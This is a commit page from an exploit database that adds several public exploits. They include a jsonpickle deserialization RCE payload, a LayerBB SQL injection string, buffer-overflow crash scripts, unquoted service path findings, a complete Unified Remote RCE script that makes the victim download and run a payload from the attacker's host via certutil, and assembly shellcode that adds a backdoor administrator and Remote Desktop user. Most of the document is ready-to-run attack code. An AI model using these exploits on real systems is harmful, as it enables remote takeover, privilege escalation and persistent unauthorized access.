Browse Source

DB: 2021-02-25

8 changes to exploits/shellcodes

SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)
Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path
Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path
python jsonpickle 2.0.0 - Remote Code Execution
Unified Remote 3.9.0.2463 - Remote Code Execution

LayerBB 1.1.4 - 'search_query' SQL Injection

Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
pull/197/head 2021-02-25
Offensive Security 2 months ago
parent
commit
338282491b
10 changed files with 382 additions and 0 deletions
  1. +27
    -0
      exploits/multiple/remote/49585.py
  2. +10
    -0
      exploits/php/webapps/49593.txt
  3. +30
    -0
      exploits/windows/dos/49589.py
  4. +30
    -0
      exploits/windows/dos/49590.py
  5. +28
    -0
      exploits/windows/local/49586.txt
  6. +28
    -0
      exploits/windows/local/49588.txt
  7. +137
    -0
      exploits/windows/remote/49587.py
  8. +7
    -0
      files_exploits.csv
  9. +1
    -0
      files_shellcodes.csv
  10. +84
    -0
      shellcodes/windows_x86/49592.asm

+ 27
- 0
exploits/multiple/remote/49585.py View File

@ -0,0 +1,27 @@
# Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution
# Date: 24-2-2021
# Vendor Homepage: https://jsonpickle.github.io
# Exploit Author: Adi Malyanker, Shay Reuven
# Software Link: https://github.com/jsonpickle/jsonpickle
# Version: 2.0.0
# Tested on: windows, linux
# Python is an open source language. jsonickle module is provided to convert objects into a serialized form,
# and later recover the data back into an object. the decode is used to undeserialize serialized strings.
# If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls.
# the problem is in the inner function loadrepr function which eval each serialized string which contains "py/repr".
# The vulnerability exists from the first version till the current version for backward compatibility. no patch is provided yet
# the payload was found during our research made on deserialization functions.
# the pattern should be :
# {..{"py/repr":<the module to import>/<the command to be executed.>}..}
# example:
malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'
# the command on the server side
some_parameter = jsonpickle.decode(malicious)

+ 10
- 0
exploits/php/webapps/49593.txt View File

@ -0,0 +1,10 @@
# Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection
# Date: 2021-02-19
# Exploit Author: Görkem Haşin
# Version: 1.1.4
# Tested on: Linux/Windows
# POST /search.php HTTP/1.1
# Host: Target
Payload: search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search

+ 30
- 0
exploits/windows/dos/49589.py View File

@ -0,0 +1,30 @@
# Exploit Title: SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)
# Exploit Author : Sinem Şahin
# Exploit Date: 2021-02-10
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
# Tested on: Windows 7 x64
# Version: 5.3.5
# Steps:
1- Run the python script. (exploit.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'SpotAuditor 5.3.5'.
4- Register -> Enter Registration Code
5- Paste clipboard into the "Name" or "Key".
6- Click on OK.
7- Crashed.
---> exploit.py <--
#!/usr/bin/env python
buffer = "\x41" * 300
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print"File okey!!"
except:
print "File is not created."

+ 30
- 0
exploits/windows/dos/49590.py View File

@ -0,0 +1,30 @@
# Exploit Title: Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
# Exploit Author : Sinem Şahin
# Exploit Date: 2021-02-23
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Version: 4.2.7
# Tested on: Windows 7 x64
# Steps:
1- Run the python script. (exploit.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'Product Key Explorer 4.2.7'.
4- Register -> Enter Registration Code
5- Paste clipboard into the "Key" or "Name".
6- Click on OK.
7- Crashed.
---> exploit.py <--
#!/usr/bin/env python
buffer = "\x41" * 300
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print "File created!"
except:
print "File cannot be created!!"

+ 28
- 0
exploits/windows/local/49586.txt View File

@ -0,0 +1,28 @@
# Exploit Title: LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path
# Discovery by: Victor Mondragón
# Discovery Date: 23-02-2021
# Vendor Homepage: https://www.softros.com/
# Software Links : https://download.logonexpert.com/LogonExpertSetup64.msi
# Tested Version: 8.1
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 7 Service Pack 1 x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
LogonExpert Service LogonExpertSvc C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe Auto
C:\>sc qc LogonExpertSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: LogonExpertSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe
LOAD_ORDER_GROUP : LogonExpertGroup
TAG : 0
DISPLAY_NAME : LogonExpert Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

+ 28
- 0
exploits/windows/local/49588.txt View File

@ -0,0 +1,28 @@
# Exploit Title: Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path
# Discovery by: Victor Mondragón
# Discovery Date: 23-02-2021
# Vendor Homepage: https://www.softros.com/
# Software Links : https://download.softros.com/SoftrosLANMessengerSetup.exe
# Tested Version: 9.6.4
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Pro 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
Softros Spell Checker SoftrosSpellChecker C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe Auto
C:\>sc qc SoftrosSpellChecker
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SoftrosSpellChecker
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe
GRUPO_ORDEN_CARGA : System Reserved
ETIQUETA : 0
NOMBRE_MOSTRAR : Softros Spell Checker
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

+ 137
- 0
exploits/windows/remote/49587.py View File

@ -0,0 +1,137 @@
# Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution
# Author: H4rk3nz0
# Vendor Homepage: https://www.unifiedremote.com/
# Software Link: https://www.unifiedremote.com/download
# Tested on: Windows 10, 10.0.19042 Build 19042
#!/usr/bin/python
import socket
import sys
import os
from time import sleep
target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 9512
# Packet Data Declarations; Windows, Space and Enter have non-standard values
open = ("00000085000108416374696f6e00000550617373776f72640038653831333362332d61313862"
"2d343361662d613763642d6530346637343738323763650005506c6174666f726d00616e64726f696400"
"0852657175657374000005536f7572636500616e64726f69642d64373038653134653532383463623831"
"000356657273696f6e000000000a00").decode("hex")
open_fin = ("000000c8000108416374696f6e0001024361706162696c69746965730004416374696f6e7"
"3000104456e6372797074696f6e3200010446617374000004477269640001044c6f6164696e6700010453"
"796e630001000550617373776f72640064363334633164636664656238373335363038613461313034646"
"5643430373664653736366464363134343336313938303961643766333538353864343439320008526571"
"75657374000105536f7572636500616e64726f69642d643730386531346535323834636238310000"
).decode("hex")
one = ("000000d2000108416374696f6e00070549440052656c6d746563682e4b6579626f61726400024"
"c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000656616c756"
"5730002000556616c756500").decode("hex")
two = ("00000000054e616d6500746f67676c6500000854797065000800000008526571756573740007"
"0252756e0002457874726173000656616c7565730002000556616c756500").decode("hex")
three = ("00000000054e616d6500746f67676c65000005536f7572636500616e64726f69642d643730"
"386531346535323834636238310000").decode("hex")
win_key = ("000000d8000108416374696f6e00070549440052656c6d746563682e4b6579626f61726"
"400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617300065"
"6616c7565730002000556616c7565004c57494e00000000054e616d6500746f67676c6500000854797"
"0650008000000085265717565737400070252756e0002457874726173000656616c756573000200055"
"6616c7565004c57494e00000000054e616d6500746f67676c65000005536f7572636500616e64726f6"
"9642d643730386531346535323834636238310000").decode("hex")
ret_key = ("000000dc000108416374696f6e00070549440052656c6d746563682e4b6579626f6172"
"6400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000"
"656616c7565730002000556616c75650052455455524e00000000054e616d6500746f67676c650000"
"08547970650008000000085265717565737400070252756e0002457874726173000656616c7565730"
"002000556616c75650052455455524e00000000054e616d6500746f67676c65000005536f75726365"
"00616e64726f69642d643730386531346535323834636238310000").decode("hex")
space_key = ("000000da000108416374696f6e00070549440052656c6d746563682e4b6579626f6"
"1726400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617"
"3000656616c7565730002000556616c756500535041434500000000054e616d6500746f67676c650"
"00008547970650008000000085265717565737400070252756e0002457874726173000656616c756"
"5730002000556616c756500535041434500000000054e616d6500746f67676c65000005536f75726"
"36500616e64726f69642d643730386531346535323834636238310000").decode("hex")
# ASCII to Hex Conversion Set
characters={
"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
"+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}
# User Specified arguments
try:
rhost = sys.argv[1]
lhost = sys.argv[2]
payload = sys.argv[3]
except:
print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>")
# Send Windows Key Input Twice
def SendWin():
target.sendto(win_key,(rhost, port))
target.sendto(win_key,(rhost, port))
sleep(0.4)
# Send Enter/Return Key Input
def SendReturn():
target.sendto(ret_key,(rhost, port))
sleep(0.4)
# Send String Characters
def SendString(string, rhost):
for char in string:
if char == " ":
target.sendto(space_key,(rhost, port))
sleep(0.02)
else:
convert = characters[char].decode("hex")
target.sendto(one + convert + two + convert + three,(rhost, port))
sleep(0.02)
# Main Execution
def main():
target.connect((rhost,port))
sleep(0.5)
print("[+] Connecting to target...")
target.sendto(open,(rhost,port)) # Initialize Connection to Unified
sleep(0.02)
target.sendto(open_fin,(rhost,port)) # Finish Initializing Connection
print("[+] Popping Start Menu")
sleep(0.02)
SendWin()
sleep(0.3)
print("[+] Opening CMD")
SendString("cmd.exe", rhost)
sleep(0.3)
SendReturn()
sleep(0.3)
print("[+] *Super Fast Hacker Typing*")
SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload, rhost) # Retrieve HTTP hosted payload
sleep(0.3)
print("[+] Downloading Payload")
SendReturn()
sleep(3)
SendString("C:\\Windows\\Temp\\" + payload, rhost) # Execute Payload
sleep(0.3)
SendReturn()
print("[+] Done! Check listener?")
target.close()
if __name__=="__main__":
main()

+ 7
- 0
files_exploits.csv View File

@ -6755,6 +6755,8 @@ id,file,description,date,author,type,platform,port
48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",2020-07-06,"Saeed reza Zamanian",dos,windows,
48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",2020-07-06,mostwanted002,dos,linux,
49589,exploits/windows/dos/49589.py,"SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)",2021-02-24,"Sinem Şahin",dos,windows,
49590,exploits/windows/dos/49590.py,"Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)",2021-02-24,"Sinem Şahin",dos,windows,
48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows,
48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
@ -11175,6 +11177,8 @@ id,file,description,date,author,type,platform,port
48469,exploits/windows/local/48469.py,"Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)",2020-05-14,gurbanli,local,windows,
48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
49577,exploits/windows/local/49577.py,"dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)",2021-02-19,"Kağan Çapar",local,windows,
49586,exploits/windows/local/49586.txt,"LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path",2021-02-24,"Victor Mondragón",local,windows,
49588,exploits/windows/local/49588.txt,"Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path",2021-02-24,"Victor Mondragón",local,windows,
48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows,
48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows,
@ -18355,6 +18359,8 @@ id,file,description,date,author,type,platform,port
48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple,
48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple,
49584,exploits/windows/remote/49584.py,"HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)",2021-02-23,Pergyz,remote,windows,
49585,exploits/multiple/remote/49585.py,"python jsonpickle 2.0.0 - Remote Code Execution",2021-02-24,"Adi Malyanker",remote,multiple,
49587,exploits/windows/remote/49587.py,"Unified Remote 3.9.0.2463 - Remote Code Execution",2021-02-24,H4rk3nz0,remote,windows,
48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php,
48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple,
@ -43775,3 +43781,4 @@ id,file,description,date,author,type,platform,port
49569,exploits/php/webapps/49569.txt,"Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-17,"Suresh Kumar",webapps,php,
49570,exploits/php/webapps/49570.txt,"Billing Management System 2.0 - 'email' SQL injection Auth Bypass",2021-02-17,"Pintu Solanki",webapps,php,
49573,exploits/php/webapps/49573.py,"Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)",2021-02-18,mari0x00,webapps,php,
49593,exploits/php/webapps/49593.txt,"LayerBB 1.1.4 - 'search_query' SQL Injection",2021-02-24,"Görkem Haşin",webapps,php,

+ 1
- 0
files_shellcodes.csv View File

@ -1031,3 +1031,4 @@ id,file,description,date,author,type,platform
49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86
49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux
49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",2021-02-09,"Felipe Winsnes",shellcode,linux_x86-64
49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86

+ 84
- 0
shellcodes/windows_x86/49592.asm View File

@ -0,0 +1,84 @@
# Exploit Title: Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
# Exploit Author: Armando Huesca Prida
# Date: 20-02-2021
#
# Tested on:
# Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
#
# Description:
# Windows x86 Shellcode that uses CreateProcessA Windows API to add a new user to administrators and remote desktop users group. This shellcode uses JMP/CALL/POP technique and static kernel32.dll functions addresses.
# It's possible to bypass bad-chars by switching the message db string between uppercase and lowercase letters.
#
# Shellcode considerations:
# Function address of CreateProcessA in kernel32.dll: 0x77082082
# Function address of ExitProcess in kernel32.dll: 0x770d214f
# Administartor user credentials: alfred:test
# Size of message db parameter, 152 bytes -> 0x98 hex =3D 0x111111A9 - 0x11111111 (0x00 badchar avoidance) ;)
#
# Assembly shellcode:
global _start
section .text
_start:
jmp application
firststep:
pop edi
xor eax, eax
mov esi, 0x111111A9
sub esi, 0x11111111
mov [edi+esi], al ; size of message db parameter
StartUpInfoANDProcessInformation:
push eax; hStderror null in this case
push eax; hStdOutput, null
push eax; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12; 18 times loop to fill both structures.
looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44; cb=3D0x44
lea eax, [esp+0x10]; eax points to StartUpInfo
; eax holds a pointer to StartUPinfo
; esp holds a pointer to Process_Info filled of null values
createprocessA:
push esp; pointer to Process-Info
push eax; pointer to StartUpInfo
xor ebx, ebx
push ebx; null
push ebx; null
push ebx; null
inc ebx
push ebx; bInheritHandles=3Dtrue
dec ebx
push ebx; null
push ebx; null
push edi; pointer to message db string
push ebx; null
mov edx, 0x77082082; CreateProcessA addr in kernel32.dll
call edx
ExitProcess:
push eax; createprocessA return in eax
mov edx, 0x770d214f; ExitProcess addr in kernel32.dll
call edx
application:
call firststep
message db 'c:\windows\system32\cmd.exe /c net user alfred test /add & net localgroup ADMINISTRATORS alfred /add & net localgroup "Remote Desktop Users" alfred /add'

Loading…
Cancel
Save